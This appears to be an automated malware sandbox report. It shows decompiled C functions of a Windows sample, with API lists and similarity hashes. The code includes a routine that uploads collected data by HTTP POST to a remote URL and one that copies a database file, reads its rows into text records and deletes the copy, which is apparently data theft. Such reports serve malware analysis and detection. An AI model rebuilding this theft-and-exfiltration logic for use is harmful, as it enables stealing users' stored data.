                                                                                                                              0x00421358
                                                                                                                              0x00421365
                                                                                                                              0x00421372
                                                                                                                              0x0042137f
                                                                                                                              0x0042138b
                                                                                                                              0x00421398
                                                                                                                              0x004213a5
                                                                                                                              0x004213b1
                                                                                                                              0x004213be
                                                                                                                              0x004213cb
                                                                                                                              0x004213d3
                                                                                                                              0x004213e0
                                                                                                                              0x004213e8
                                                                                                                              0x004213f0
                                                                                                                              0x004213f1
                                                                                                                              0x004213ff

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 00420C1F
                                                                                                                              • _memset.LIBCMT ref: 00420C35
                                                                                                                              • _memset.LIBCMT ref: 00420C4B
                                                                                                                              • _memset.LIBCMT ref: 00420C61
                                                                                                                              • _memset.LIBCMT ref: 00420C77
                                                                                                                              • _memset.LIBCMT ref: 00420C8D
                                                                                                                              • _memset.LIBCMT ref: 00420CA3
                                                                                                                              • _memset.LIBCMT ref: 00420CB9
                                                                                                                              • _memset.LIBCMT ref: 00420CCF
                                                                                                                              • _memset.LIBCMT ref: 00420CE5
                                                                                                                              • _memset.LIBCMT ref: 00420CFB
                                                                                                                              • _memset.LIBCMT ref: 00420D11
                                                                                                                              • _memset.LIBCMT ref: 00420D27
                                                                                                                              • _memset.LIBCMT ref: 00420D3D
                                                                                                                              • _memset.LIBCMT ref: 00420D53
                                                                                                                              • _memset.LIBCMT ref: 00420D69
                                                                                                                              • _memset.LIBCMT ref: 00420D7F
                                                                                                                                • Part of subcall function 00421620: _memset.LIBCMT ref: 00421634
                                                                                                                                • Part of subcall function 00421620: _strcpy_s.LIBCMT ref: 00421653
                                                                                                                                • Part of subcall function 00421620: _memset.LIBCMT ref: 0042168E
                                                                                                                                • Part of subcall function 0041A580: _malloc.LIBCMT ref: 0041A58A
                                                                                                                                • Part of subcall function 0041A580: _rand.LIBCMT ref: 0041A5C4
                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 00421042
                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 00421051
                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 00421060
                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0042106F
                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0042107E
                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 0042108B
                                                                                                                                • Part of subcall function 0041EBD0: _memset.LIBCMT ref: 0041EBF8
                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 004210A7
                                                                                                                                • Part of subcall function 00424F00: _memset.LIBCMT ref: 00424F0F
                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 004210C8
                                                                                                                                • Part of subcall function 00422460: __mbstowcs_l.LIBCMTD ref: 00422593
                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?), ref: 004211B7
                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004212D9
                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00421358
                                                                                                                              • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00421365
                                                                                                                              • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00421372
                                                                                                                              • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0042137F
                                                                                                                              • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0042138B
                                                                                                                              • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00421398
                                                                                                                              • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004213A5
                                                                                                                              • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004213B1
                                                                                                                              • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004213BE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$Directory$DeleteFile$Current$Create$Remove__mbstowcs_l_malloc_rand_strcpy_s
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2268797614-0
                                                                                                                              • Opcode ID: cbfad0e375860adb4d06db9ddde89303de32c4b1c5cf1502787c92192467c048
                                                                                                                              • Instruction ID: 7bf28244e14e6d77cc8870e9b1224398cc7b19c98e316186366d6ff2b1321c67
                                                                                                                              • Opcode Fuzzy Hash: cbfad0e375860adb4d06db9ddde89303de32c4b1c5cf1502787c92192467c048
                                                                                                                              • Instruction Fuzzy Hash: 2F22DA72D00219ABDB14EBA0ED45EDA73B8BF58304F0445EAF109A7191DFB49B88CF65
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041BEE0, Relevance: 44.0, APIs: 29, Instructions: 492libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$LibraryLoadVersion
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 871892915-0
                                                                                                                              • Opcode ID: f59af888b5717aaf9566395d8c9c53b99e9af5a8d934e0a4aaff498b539cd5cb
                                                                                                                              • Instruction ID: 9c1cb109650bf368c340d73eaff42f367f4baa9dcd49982eb3bde8b86a13c175
                                                                                                                              • Opcode Fuzzy Hash: f59af888b5717aaf9566395d8c9c53b99e9af5a8d934e0a4aaff498b539cd5cb
                                                                                                                              • Instruction Fuzzy Hash: D412AFB1A00218AFDB64DF50DD85FDAB7B9EB48704F1042D9F609A72D0D7B4AA84CF58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00422460, Relevance: 40.6, APIs: 17, Strings: 6, Instructions: 306networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 91%
                                                                                                                              			E00422460(void* __ebx, void** __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char* _v8;
				char _v16;
				signed int _v20;
				signed int _v24;
				char _v52;
				char _v80;
				void* _v84;
				intOrPtr _v88;
				void _v92;
				void* _v96;
				void* _v100;
				char _v128;
				int _v132;
				char _v184;
				long _v188;
				void _v456;
				char* _v460;
				void* _v464;
				long _v468;
				char* _v472;
				void** _v476;
				signed int _t128;
				signed int _t129;
				void* _t147;
				long _t150;
				void* _t158;
				void* _t164;
				long _t169;
				long _t177;
				int _t182;
				void* _t199;
				void* _t271;
				void* _t272;
				signed int _t273;
				void* _t274;
				void* _t275;
				void* _t281;

				_t272 = __esi;
				_t271 = __edi;
				_t199 = __ebx;
				_push(0xffffffff);
				_push(E004266A4);
				_push( *[fs:0x0]);
				_t275 = _t274 - 0x1cc;
				_t128 =  *0x4301f4; // 0xe687535
				_t129 = _t128 ^ _t273;
				_v24 = _t129;
				_push(_t129);
				 *[fs:0x0] =  &_v16;
				_v476 = __ecx;
				_t131 = _v476;
				_v476[0xd] = 0;
				if(_v476[0xb] != 0) {
					_v464 = _v476[0xb];
					_push(_v464);
					_t131 = E00405122();
					_t275 = _t275 + 4;
					_v476[0xb] = 0;
				}
				E00421740(_t131, _v476, "--");
				E00421740(E00421740( &(_v476[4]), _v476,  &(_v476[4])), _v476, "--\r\n");
				E004011C0( &_v52, _a4);
				_v8 = 0;
				_v88 = E00401EE0( &_v52, "http://", 0);
				_t281 = _v88 -  *0x42d8c4; // 0xffffffff
				if(_t281 != 0) {
					E00401B90( &_v52, _v88, 7);
				}
				_v88 = E00401370( &_v52, 0x2f, 0);
				E00401F30( &_v52,  &_v80, 0, _v88);
				_v8 = 1;
				E00401B90( &_v52, 0, _v88);
				E00401E10( &(_v476[0x11]), 0x104, _a4, 0x103);
				_v20 = 0;
				if(_v476[0xe] != 0) {
					_v20 = _v20 | 0x00000003;
				}
				_t257 = _v476;
				_t147 = InternetOpenA(_v476[3], _v20, _v476[0xe], 0, 0); // executed
				_v84 = _t147;
				if(_v84 != 0) {
					_v92 = 1;
					InternetSetOptionA(_v84, 0x41,  &_v92, 4);
					_t257 = _v476;
					_t158 = InternetConnectA(_v84, E00401330( &_v80), 0x50, _v476[0xf], _v476[0x10], 3, 0, 1); // executed
					_v96 = _t158;
					if(_v96 != 0) {
						InternetSetOptionA(_v96, 0x41, 1, 0);
						_t164 = HttpOpenRequestA(_v96, "POST", E00401330( &_v52), 0, 0, 0, 0x400000, 1); // executed
						_v100 = _t164;
						if(_v100 != 0) {
							E004217A0(_t199, _v476, _t271, _t272, _v100);
							E004011C0( &_v128, "Content-Type: multipart/form-data; boundary=");
							_v8 = 2;
							E00401EC0( &_v128,  &(_v476[4]));
							_t169 = E00401350( &_v128);
							HttpAddRequestHeadersA(_v100, E00401330( &_v128), _t169, 0x20000000);
							E00404F9A(_v476[2],  &_v184, 0x32, 0xa);
							E00401EA0( &_v128, "Content-Length: ");
							E00401EC0( &_v128,  &_v184);
							_t177 = E00401350( &_v128);
							HttpAddRequestHeadersA(_v100, E00401330( &_v128), _t177, 0x20000000);
							_t182 = HttpSendRequestA(_v100, 0, 0,  *_v476, _v476[2]); // executed
							_v132 = _t182;
							if(_v132 != 0) {
								_v188 = 0x104;
								if(HttpQueryInfoA(_v100, 0x2e,  &_v456,  &_v188, 0) != 0) {
									InternetCloseHandle(_v100);
									 *((char*)(_t273 + _v188 - 0x1c4)) = 0;
									_v460 = E00401E50( &_v456, "http");
									E00401E10( &(_v476[0x11]), 0x104, _v460, 0x103);
									_v100 = InternetOpenUrlA(_v84, _v460, 0, 0, 0x400000, 0);
								}
								if(_v100 != 0) {
									E00421CF0(_t199, _v476, _t271, _t272, _v100); // executed
								}
							}
							InternetCloseHandle(_v100); // executed
							_v8 = 1;
							E004012D0( &_v128);
						}
						_t257 = _v96;
						InternetCloseHandle(_v96);
					}
					InternetCloseHandle(_v84);
				}
				if(_v476[0xd] <= 0) {
					_v472 = 0;
					_v8 = 0;
					E004012D0( &_v80);
					_v8 = 0xffffffff;
					E004012D0( &_v52);
					_t150 = _v472;
				} else {
					_v468 = 1;
					_v8 = 0;
					E004012D0( &_v80);
					_v8 = 0xffffffff;
					E004012D0( &_v52);
					_t150 = _v468;
				}
				 *[fs:0x0] = _v16;
				return E00404354(_t150, _t199, _v24 ^ _t273, _t257, _t271, _t272);
			}








































                                                                                                                              0x00422460
                                                                                                                              0x00422460
                                                                                                                              0x00422460
                                                                                                                              0x00422463
                                                                                                                              0x00422465
                                                                                                                              0x00422470
                                                                                                                              0x00422471
                                                                                                                              0x00422477
                                                                                                                              0x0042247c
                                                                                                                              0x0042247e
                                                                                                                              0x00422481
                                                                                                                              0x00422485
                                                                                                                              0x0042248b
                                                                                                                              0x00422491
                                                                                                                              0x00422497
                                                                                                                              0x004224a8
                                                                                                                              0x004224b3
                                                                                                                              0x004224bf
                                                                                                                              0x004224c0
                                                                                                                              0x004224c5
                                                                                                                              0x004224ce
                                                                                                                              0x004224ce
                                                                                                                              0x004224e0
                                                                                                                              0x00422505
                                                                                                                              0x00422511
                                                                                                                              0x00422516
                                                                                                                              0x0042252c
                                                                                                                              0x00422532
                                                                                                                              0x00422538
                                                                                                                              0x00422543
                                                                                                                              0x00422543
                                                                                                                              0x00422554
                                                                                                                              0x00422564
                                                                                                                              0x00422569
                                                                                                                              0x00422576
                                                                                                                              0x00422593
                                                                                                                              0x0042259b
                                                                                                                              0x004225ac
                                                                                                                              0x004225b4
                                                                                                                              0x004225b4
                                                                                                                              0x004225c9
                                                                                                                              0x004225d3
                                                                                                                              0x004225d9
                                                                                                                              0x004225e0
                                                                                                                              0x004225e6
                                                                                                                              0x004225f9
                                                                                                                              0x0042260f
                                                                                                                              0x00422628
                                                                                                                              0x0042262e
                                                                                                                              0x00422635
                                                                                                                              0x00422645
                                                                                                                              0x0042266a
                                                                                                                              0x00422670
                                                                                                                              0x00422677
                                                                                                                              0x00422687
                                                                                                                              0x00422694
                                                                                                                              0x00422699
                                                                                                                              0x004226aa
                                                                                                                              0x004226b7
                                                                                                                              0x004226ca
                                                                                                                              0x004226e5
                                                                                                                              0x004226f5
                                                                                                                              0x00422704
                                                                                                                              0x00422711
                                                                                                                              0x00422724
                                                                                                                              0x00422745
                                                                                                                              0x0042274b
                                                                                                                              0x00422752
                                                                                                                              0x00422758
                                                                                                                              0x00422780
                                                                                                                              0x00422786
                                                                                                                              0x00422792
                                                                                                                              0x004227ae
                                                                                                                              0x004227cf
                                                                                                                              0x004227f3
                                                                                                                              0x004227f3
                                                                                                                              0x004227fa
                                                                                                                              0x00422806
                                                                                                                              0x00422806
                                                                                                                              0x004227fa
                                                                                                                              0x0042280f
                                                                                                                              0x00422815
                                                                                                                              0x0042281c
                                                                                                                              0x0042281c
                                                                                                                              0x00422821
                                                                                                                              0x00422825
                                                                                                                              0x00422825
                                                                                                                              0x0042282f
                                                                                                                              0x0042282f
                                                                                                                              0x0042283f
                                                                                                                              0x00422870
                                                                                                                              0x0042287a
                                                                                                                              0x00422881
                                                                                                                              0x00422886
                                                                                                                              0x00422890
                                                                                                                              0x00422895
                                                                                                                              0x00422841
                                                                                                                              0x00422841
                                                                                                                              0x0042284b
                                                                                                                              0x00422852
                                                                                                                              0x00422857
                                                                                                                              0x00422861
                                                                                                                              0x00422866
                                                                                                                              0x00422866
                                                                                                                              0x004228bb
                                                                                                                              0x004228d0

                                                                                                                              APIs
                                                                                                                              • __mbstowcs_l.LIBCMTD ref: 00422593
                                                                                                                              • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004225D3
                                                                                                                              • InternetSetOptionA.WININET(00000000,00000041,00000001,00000004), ref: 004225F9
                                                                                                                              • InternetConnectA.WININET(00000000,00000000,00000050,?,?,00000003,00000000,00000001), ref: 00422628
                                                                                                                              • InternetSetOptionA.WININET(00000000,00000041,00000001,00000000), ref: 00422645
                                                                                                                              • HttpOpenRequestA.WININET(00000000,POST,00000000,00000000,00000000,00000000,00400000,00000001), ref: 0042266A
                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00422825
                                                                                                                                • Part of subcall function 004217A0: HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 004217FA
                                                                                                                                • Part of subcall function 004217A0: HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00421828
                                                                                                                                • Part of subcall function 004217A0: HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00421856
                                                                                                                                • Part of subcall function 004217A0: HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00421884
                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 004226CA
                                                                                                                              • __itow_s.LIBCMT ref: 004226E5
                                                                                                                                • Part of subcall function 00404F9A: _xtoa_s@20.LIBCMT ref: 00404FBD
                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00422724
                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00422745
                                                                                                                              • HttpQueryInfoA.WININET(00000000,0000002E,?,00000104,00000000), ref: 00422778
                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00422786
                                                                                                                              • __mbstowcs_l.LIBCMTD ref: 004227CF
                                                                                                                                • Part of subcall function 00401E10: __cftof.LIBCMT ref: 00401E23
                                                                                                                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00400000,00000000), ref: 004227ED
                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0042280F
                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0042282F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: HttpInternet$Request$Headers$CloseHandle$Open$Option__mbstowcs_l$ConnectInfoQuerySend__cftof__itow_s_xtoa_s@20
                                                                                                                              • String ID: --$Content-Length: $Content-Type: multipart/form-data; boundary=$POST$http$http://
                                                                                                                              • API String ID: 463163979-1095625359
                                                                                                                              • Opcode ID: 6ef930aceb50f50c88dad62f9af03b6e3da15786f337afd65bc5808adaf03fda
                                                                                                                              • Instruction ID: faf664677b1087e991e18eee5182954285e9de6bbfcc660a5bad21f60391df42
                                                                                                                              • Opcode Fuzzy Hash: 6ef930aceb50f50c88dad62f9af03b6e3da15786f337afd65bc5808adaf03fda
                                                                                                                              • Instruction Fuzzy Hash: D4D13C70A00218ABDB14EB94DC95FEEB375BB44704F5041AAF505BB2D1DBB8AE84CF58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041E0E0, Relevance: 36.4, APIs: 24, Instructions: 367filestringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 51%
                                                                                                                              			E0041E0E0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v48;
				char _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				char _v352;
				intOrPtr _v356;
				intOrPtr* _v360;
				intOrPtr _v364;
				char _v392;
				intOrPtr* _v396;
				intOrPtr* _v400;
				char _v401;
				char _v402;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr* _v416;
				intOrPtr* _v420;
				char _v421;
				char _v422;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				void* __ebp;
				signed int _t123;
				signed int _t124;
				void* _t132;
				int _t133;
				void* _t136;
				intOrPtr _t140;
				intOrPtr _t141;
				void* _t142;
				void* _t148;
				intOrPtr* _t152;
				intOrPtr _t153;
				intOrPtr _t163;
				void* _t167;
				intOrPtr* _t177;
				intOrPtr _t178;
				intOrPtr _t188;
				void* _t192;
				void* _t201;
				intOrPtr _t202;
				char _t215;
				intOrPtr _t218;
				char _t228;
				intOrPtr _t231;
				char _t240;
				char _t241;
				intOrPtr _t243;
				intOrPtr _t246;
				intOrPtr _t255;
				intOrPtr _t259;
				intOrPtr _t265;
				intOrPtr _t269;
				void* _t272;
				void* _t273;
				signed int _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t281;

				_t273 = __esi;
				_t272 = __edi;
				_t201 = __ebx;
				_t123 =  *0x4301f4; // 0xe687535
				_t124 = _t123 ^ _t274;
				_v20 = _t124;
				 *[fs:0x0] =  &_v16;
				GetCurrentDirectoryA(0x104,  &_v352);
				_t202 =  *0x432400; // 0x2336800
				 *0x4328c4( &_v352, _t202, _t124,  *[fs:0x0], E004265BC, 0xffffffff);
				CopyFileA(_a8,  &_v352, 1);
				_t243 =  *0x432158; // 0x2336cf0
				_v84 = _t243;
				_t132 =  *0x432750( &_v352,  &_v80); // executed
				_t277 = _t275 - 0x1a8 + 8;
				if(_t132 == 0) {
					_t136 =  *0x432700(_v80, _v84, 0xffffffff,  &_v88, 0);
					_t278 = _t277 + 0x14;
					if(_t136 == 0) {
						_t246 =  *0x432188; // 0x23366d0
						_t140 =  *0x4325d0; // 0x23369c8
						_t141 = E004055AB(_t140, _t246); // executed
						_t278 = _t278 + 8;
						_v356 = _t141;
						if(_v356 != 0) {
							while(1) {
								L3:
								_t142 =  *0x432720(_v88);
								_t281 = _t278 + 4;
								if(_t142 != 0x64) {
									break;
								}
								_v364 =  *0x43273c(_v88, 0);
								_v360 =  *0x43273c(_v88, 1);
								_t148 =  *0x43272c(_v88, 2, _a16, _a20);
								E0041D730(_t201,  &_v392,  *0x432734(), _v88, 2, _t148);
								_t278 = _t281 + 0x34;
								_v8 = 0;
								_v396 = 0x42942e;
								_v400 = E00401330( &_v392);
								while(1) {
									_t152 = _v400;
									_t215 =  *_t152;
									_v401 = _t215;
									if(_t215 !=  *_v396) {
										break;
									}
									if(_v401 == 0) {
										L9:
										_v408 = 0;
									} else {
										_t152 = _v400;
										_t241 =  *((intOrPtr*)(_t152 + 1));
										_v402 = _t241;
										_t37 = _v396 + 1; // 0x69620a00
										if(_t241 !=  *_t37) {
											break;
										} else {
											_v400 = _v400 + 2;
											_v396 = _v396 + 2;
											if(_v402 != 0) {
												continue;
											} else {
												goto L9;
											}
										}
									}
									L11:
									_v412 = _v408;
									if(_v412 != 0) {
										_t153 =  *0x43239c; // 0x2336b00
										E004055C2(_t201, _t272, _t273, __eflags);
										E004055C2(_t201, _t272, _t273, __eflags);
										_t218 =  *0x4323b8; // 0x2336b48
										E004055C2(_t201, _t272, _t273, __eflags);
										E004055C2(_t201, _t272, _t273, __eflags);
										_t255 =  *0x432258; // 0x2336a10
										E004055C2(_t201, _t272, _t273, __eflags);
										E004055C2(_t201, _t272, _t273, __eflags);
										_t163 =  *0x4322b4; // 0x2336938
										E004055C2(_t201, _t272, _t273, __eflags);
										E004055C2(_t201, _t272, _t273, __eflags);
										_t167 =  *0x43272c(_v88, 2, _a16, _a20, _v356, "\n", _v356, _t163, _v360, _v356, "\n", _v356, _t255, _v364, _v356, "\n", _v356, _t218, _a12, _v356, "\n", _v356, _t153, _a4);
										_v440 = E0041D730(_t201,  &_v76,  *0x432734(), _v88, 2, _t167);
										_push(E00401330(_v440));
										_t259 =  *0x4326c4; // 0x2336a28
										_push(_t259);
										_push(_v356);
										E004055C2(_t201, _t272, _t273, __eflags);
										E004012D0( &_v76);
										_push("\n\n");
										_push(_v356);
										E004055C2(_t201, _t272, _t273, __eflags);
										_t278 = _t278 + 0x88;
									} else {
										_v416 = 0x42942f;
										_v420 = _v360;
										while(1) {
											_t177 = _v420;
											_t228 =  *_t177;
											_v421 = _t228;
											if(_t228 !=  *_v416) {
												break;
											}
											if(_v421 == 0) {
												L17:
												_v428 = 0;
											} else {
												_t177 = _v420;
												_t240 =  *((intOrPtr*)(_t177 + 1));
												_v422 = _t240;
												_t59 = _v416 + 1; // 0x7469620a
												if(_t240 !=  *_t59) {
													break;
												} else {
													_v420 = _v420 + 2;
													_v416 = _v416 + 2;
													if(_v422 != 0) {
														continue;
													} else {
														goto L17;
													}
												}
											}
											L19:
											_v432 = _v428;
											if(_v432 != 0) {
												_t178 =  *0x43239c; // 0x2336b00
												E004055C2(_t201, _t272, _t273, __eflags);
												E004055C2(_t201, _t272, _t273, __eflags);
												_t231 =  *0x4323b8; // 0x2336b48
												E004055C2(_t201, _t272, _t273, __eflags);
												E004055C2(_t201, _t272, _t273, __eflags);
												_t265 =  *0x432258; // 0x2336a10
												E004055C2(_t201, _t272, _t273, __eflags);
												E004055C2(_t201, _t272, _t273, __eflags);
												_t188 =  *0x4322b4; // 0x2336938
												E004055C2(_t201, _t272, _t273, __eflags);
												E004055C2(_t201, _t272, _t273, __eflags);
												_t192 =  *0x43272c(_v88, 2, _a16, _a20, _v356, "\n", _v356, _t188, _v360, _v356, "\n", _v356, _t265, _v364, _v356, "\n", _v356, _t231, _a12, _v356, "\n", _v356, _t178, _a4);
												_v436 = E0041D730(_t201,  &_v48,  *0x432734(), _v88, 2, _t192);
												_push(E00401330(_v436));
												_t269 =  *0x4326c4; // 0x2336a28
												_push(_t269);
												_push(_v356);
												E004055C2(_t201, _t272, _t273, __eflags);
												E004012D0( &_v48);
												_push("\n\n");
												_push(_v356);
												E004055C2(_t201, _t272, _t273, __eflags);
												_t278 = _t278 + 0x88;
											}
											goto L24;
										}
										asm("sbb eax, eax");
										asm("sbb eax, 0xffffffff");
										_v428 = _t177;
										goto L19;
									}
									L24:
									_v8 = 0xffffffff;
									E004012D0( &_v392);
									goto L3;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								_v408 = _t152;
								goto L11;
							}
							_push(_v356); // executed
							E00405EA3(_t201, _v356, _t272, _t273, __eflags); // executed
							_t278 = _t281 + 4;
						}
					}
					 *0x432724(_v88);
					 *0x432754(_v80);
				}
				_t133 = DeleteFileA( &_v352); // executed
				 *[fs:0x0] = _v16;
				__eflags = _v20 ^ _t274;
				return E00404354(_t133, _t201, _v20 ^ _t274,  &_v352, _t272, _t273);
			}





































































                                                                                                                              0x0041e0e0
                                                                                                                              0x0041e0e0
                                                                                                                              0x0041e0e0
                                                                                                                              0x0041e0f7
                                                                                                                              0x0041e0fc
                                                                                                                              0x0041e0fe
                                                                                                                              0x0041e105
                                                                                                                              0x0041e117
                                                                                                                              0x0041e11d
                                                                                                                              0x0041e12b
                                                                                                                              0x0041e13e
                                                                                                                              0x0041e144
                                                                                                                              0x0041e14a
                                                                                                                              0x0041e158
                                                                                                                              0x0041e15e
                                                                                                                              0x0041e163
                                                                                                                              0x0041e179
                                                                                                                              0x0041e17f
                                                                                                                              0x0041e184
                                                                                                                              0x0041e18a
                                                                                                                              0x0041e191
                                                                                                                              0x0041e197
                                                                                                                              0x0041e19c
                                                                                                                              0x0041e19f
                                                                                                                              0x0041e1ac
                                                                                                                              0x0041e1b2
                                                                                                                              0x0041e1b2
                                                                                                                              0x0041e1b6
                                                                                                                              0x0041e1bc
                                                                                                                              0x0041e1c2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e1d7
                                                                                                                              0x0041e1ec
                                                                                                                              0x0041e200
                                                                                                                              0x0041e221
                                                                                                                              0x0041e226
                                                                                                                              0x0041e229
                                                                                                                              0x0041e230
                                                                                                                              0x0041e245
                                                                                                                              0x0041e24b
                                                                                                                              0x0041e24b
                                                                                                                              0x0041e251
                                                                                                                              0x0041e253
                                                                                                                              0x0041e261
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e26a
                                                                                                                              0x0041e29d
                                                                                                                              0x0041e29d
                                                                                                                              0x0041e26c
                                                                                                                              0x0041e26c
                                                                                                                              0x0041e272
                                                                                                                              0x0041e275
                                                                                                                              0x0041e281
                                                                                                                              0x0041e284
                                                                                                                              0x00000000
                                                                                                                              0x0041e286
                                                                                                                              0x0041e286
                                                                                                                              0x0041e28d
                                                                                                                              0x0041e29b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e29b
                                                                                                                              0x0041e284
                                                                                                                              0x0041e2b4
                                                                                                                              0x0041e2ba
                                                                                                                              0x0041e2c7
                                                                                                                              0x0041e4a3
                                                                                                                              0x0041e4b0
                                                                                                                              0x0041e4c4
                                                                                                                              0x0041e4d0
                                                                                                                              0x0041e4de
                                                                                                                              0x0041e4f2
                                                                                                                              0x0041e501
                                                                                                                              0x0041e50f
                                                                                                                              0x0041e523
                                                                                                                              0x0041e532
                                                                                                                              0x0041e53f
                                                                                                                              0x0041e553
                                                                                                                              0x0041e569
                                                                                                                              0x0041e58f
                                                                                                                              0x0041e5a0
                                                                                                                              0x0041e5a1
                                                                                                                              0x0041e5a7
                                                                                                                              0x0041e5ae
                                                                                                                              0x0041e5af
                                                                                                                              0x0041e5ba
                                                                                                                              0x0041e5bf
                                                                                                                              0x0041e5ca
                                                                                                                              0x0041e5cb
                                                                                                                              0x0041e5d0
                                                                                                                              0x0041e2cd
                                                                                                                              0x0041e2cd
                                                                                                                              0x0041e2dd
                                                                                                                              0x0041e2e3
                                                                                                                              0x0041e2e3
                                                                                                                              0x0041e2e9
                                                                                                                              0x0041e2eb
                                                                                                                              0x0041e2f9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e302
                                                                                                                              0x0041e335
                                                                                                                              0x0041e335
                                                                                                                              0x0041e304
                                                                                                                              0x0041e304
                                                                                                                              0x0041e30a
                                                                                                                              0x0041e30d
                                                                                                                              0x0041e319
                                                                                                                              0x0041e31c
                                                                                                                              0x00000000
                                                                                                                              0x0041e31e
                                                                                                                              0x0041e31e
                                                                                                                              0x0041e325
                                                                                                                              0x0041e333
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e333
                                                                                                                              0x0041e31c
                                                                                                                              0x0041e34c
                                                                                                                              0x0041e352
                                                                                                                              0x0041e35f
                                                                                                                              0x0041e36a
                                                                                                                              0x0041e377
                                                                                                                              0x0041e38b
                                                                                                                              0x0041e397
                                                                                                                              0x0041e3a5
                                                                                                                              0x0041e3b9
                                                                                                                              0x0041e3c8
                                                                                                                              0x0041e3d6
                                                                                                                              0x0041e3ea
                                                                                                                              0x0041e3f9
                                                                                                                              0x0041e406
                                                                                                                              0x0041e41a
                                                                                                                              0x0041e430
                                                                                                                              0x0041e456
                                                                                                                              0x0041e467
                                                                                                                              0x0041e468
                                                                                                                              0x0041e46e
                                                                                                                              0x0041e475
                                                                                                                              0x0041e476
                                                                                                                              0x0041e481
                                                                                                                              0x0041e486
                                                                                                                              0x0041e491
                                                                                                                              0x0041e492
                                                                                                                              0x0041e497
                                                                                                                              0x0041e497
                                                                                                                              0x00000000
                                                                                                                              0x0041e49a
                                                                                                                              0x0041e341
                                                                                                                              0x0041e343
                                                                                                                              0x0041e346
                                                                                                                              0x00000000
                                                                                                                              0x0041e346
                                                                                                                              0x0041e5d3
                                                                                                                              0x0041e5d3
